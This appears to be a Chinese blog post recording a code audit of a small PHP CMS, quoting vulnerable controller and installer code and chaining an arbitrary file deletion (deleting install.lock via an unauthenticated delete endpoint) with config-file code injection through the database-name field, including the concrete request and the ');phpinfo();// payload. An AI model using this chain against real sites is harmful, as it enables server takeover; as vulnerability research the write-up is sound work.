记一次cms代码

zhaorong · 发表于 WEB前端技术 2021-8-11 14:26:31


	0×00：前言记录一次小型cms代码审计 0×01：任意文件删除因为代码繁杂，不再一展示 /app/controller/kindeditor.class.php 关键漏洞代码 public function delete() { $path = ROOT_PATH.$_GET['pic']; unlink($path); $flash = M("flash"); $row = $flash->query("delete from tc_flash where photo='".$_GET['pic']."'"); echo '删除成功'; } } 复制代码直接调用删除方法可以得到图片参数就可以任意任意文件 0×02：获取shell /安装/index.php case '4': if (intval($_GET['install'])) { $n = intval($_GET['n']); $arr = array(); $dbHost = trim($_POST['dbhost']); $dbPort = trim($_POST['dbport']); $dbName = trim($_POST['dbname']); $dbHost = empty($dbPort) \|\| $dbPort == 3306 ? $dbHost : $dbHost . ':' . $dbPort; $dbUser = trim($_POST['dbuser']); $dbPwd = trim($_POST['dbpw']); $dbPrefix = empty($_POST['dbprefix']) ? 'tc_' : trim($_POST['dbprefix']); $uname = trim($_POST['manager_email']); $password = trim($_POST['manager_pwd']); $webpath = trim($_POST['webpath']); ...... ...... if ($i == 999999) exit; $message = '成功添加站点信息<br />成功写入配置文件<br>安装完成．'; // $newmodelstr = "<?php \n"; $newmodelstr .= " define('DBHOST', '" . $dbHost . "');\n "; $newmodelstr .= "define('DBUSER', '" . $dbUser . "');\n "; $newmodelstr .= "define('DBPWD', '" . $dbPwd . "');\n "; $newmodelstr .= "define('DBNAME', '" . $dbName . "');\n "; $newmodelstr .= "define('DBCODE', 'utf8');\n "; $newmodelstr .= "define('DBCONN', " . $db_pconnect . ");\n "; $newmodelstr .= "define('MORESITE', false);\n "; $newmodelstr .= "define('USEMC', false);\n "; $newmodelstr .= "define('MCHOST', '127.0.0.1');\n "; $newmodelstr .= "define('MCPORT','11211');\n "; $newmodelstr .= "define('MCHOST2', '127.0.0.1');\n "; $newmodelstr .= "define('MCPORT2','11211');\n "; $newmodelstr .= "\n?>\n"; $targetFile = '../app/data/mysql.php'; @file_put_contents($targetFile, $newmodelstr); $arr = array('n' => 999999, 'msg' => $message); die(json_encode($arr)); } include_once ("./templates/s4.php"); exit; 复制代码在安装cms的时候在$dbName可以写入一句木马进行getshell 当然当你访问网站的时候已经是安装好了的这时候需要上一个任意文件删除的漏洞删除/app/data/install.lock文件进行系统重装 0×03：如何调用 /**cms/core/controller.class.php 控制器代码 public function Run() { $this->Analysis (); $this->control = $_GET ['c']; $this->action = $_GET ['a']; if ($_GET ['a'] === "list") { $this->action = "listAll"; } $groupDir = GROUP_DIR; $controlFile = ROOT_PATH . '/' . APP_PATH . "/" . GROUP_DIR . "/" . $this->control . '.class.php'; if (! file_exists ( $controlFile )) { $this->setValue ( "error", $this->control . Config::lang ( "CONTROLLERNOTEXISTS" ) ); $this->forward ( "error.html" ); exit (); } include ($controlFile); if (! class_exists ( $this->control )) { $this->setValue ( "error", $this->control . Config::lang ( "CONTROLLERNOTDEFINED" ) ); $this->forward ( "error.html" ); exit (); } if (! empty ( $_REQUEST ['token'] ) && ! in_array ( $_REQUEST ['ac'], array ('user_login', 'user_reg', 'user_regOrLoginProtocol', 'user_findPwd', 'user_getCode' ) )) { $this->pubCheck (); } $instance = new $this->control (); $methodName = $this->action; $instance->$methodName (); $this->forceAttack(); 复制代码* 跟进$this->Analysis();方法 protected function Analysis() { $ac = array (); $acStr = $_GET ['ac']; if (empty ( $acStr )) { // 无ac参数 $ac [0] = $this->control; $ac [1] = $this->action; } else if (! strpos ( $acStr, '_' ) && $acStr) { // ac=list $ac [0] = $acStr; // empty($this->control) ? self::getDefaultAction() : $this->control;//NULL $ac [1] = self::getDefaultAction (); $modelClass = $ac [1]; $controlClass = $ac [0]; } else { // ac=news_list 支持下划线的控制器 $acAry = explode ( "_", $acStr ); if (count ( $acAry ) == 2) { $modelClass = $acAry [1]; $controlClass = $acAry [0]; } if (count ( $acAry ) == 3) { $modelClass = $acAry [2]; $controlClass = $acAry [0] . '_' . $acAry [1]; } } if ($this->c ['URL_MODE'] == 1) { $this->control = ! empty ( $controlClass ) ? trim ( $controlClass ) : $this->control; $this->action = ! empty ( $modelClass ) ? trim ( $modelClass ) : $this->action; } else if ($this->c ['URL_MODE'] == 2) { if (isset ( $_SERVER ['PATH_INFO'] )) { $path = trim ( $_SERVER ['PATH_INFO'], '/' ); $paths = explode ( '/', $path ); // index.php/news/show/id/275 $this->control = array_shift ( $paths ); // news $this->action = array_shift ( $paths ); // show ParseUrl (); // news/show/id/275 index.php后面的 } } else if ($this->c ['URL_MODE'] == 3) { // $_SERVER["QUERY_STRING"]=> // string(19) "ac=news_show&id=275" // $_SERVER["REQUEST_URI"]=> // string(30) "/index.php?ac=news_show&id=275" // bencandy.php?fid-{$fid}-id-{$id}-page-{$page}.html $path = str_replace ( ".asp", "", $_SERVER ["QUERY_STRING"] ); // news-show-1 $paths = explode ( '-', $path ); $this->control = array_shift ( $paths ); // news $this->action = array_shift ( $paths ); // show $key = $this->action == 'show' ? 'id' : 'page'; $_GET [$key] = array_shift ( $paths ); // id page classidss } $_GET ['c'] = ! empty ( $this->control ) ? $this->control : 'index'; $_GET ['a'] = ! empty ( $this->action ) ? $this->action : self::getDefaultAction (); $ac [0] = $_GET ['c']; $ac [1] = $_GET ['a']; 复制代码 http://url/index.php?ac=控制器_方法名进行访问构造payload ac=kindeditor_delete&pic=/app/data/install.lock 删除成功进入到安装界面数据库名称处输入');phpinfo();// 再次访问/*cms/index.php 成功输出 0×04：总结** 代码审计跟踪就对了知识点的综合利用很重要。继续审计上面漏洞挺多的。

微信扫一扫 分享朋友圈

记一次cms代码

微信扫一扫分享朋友圈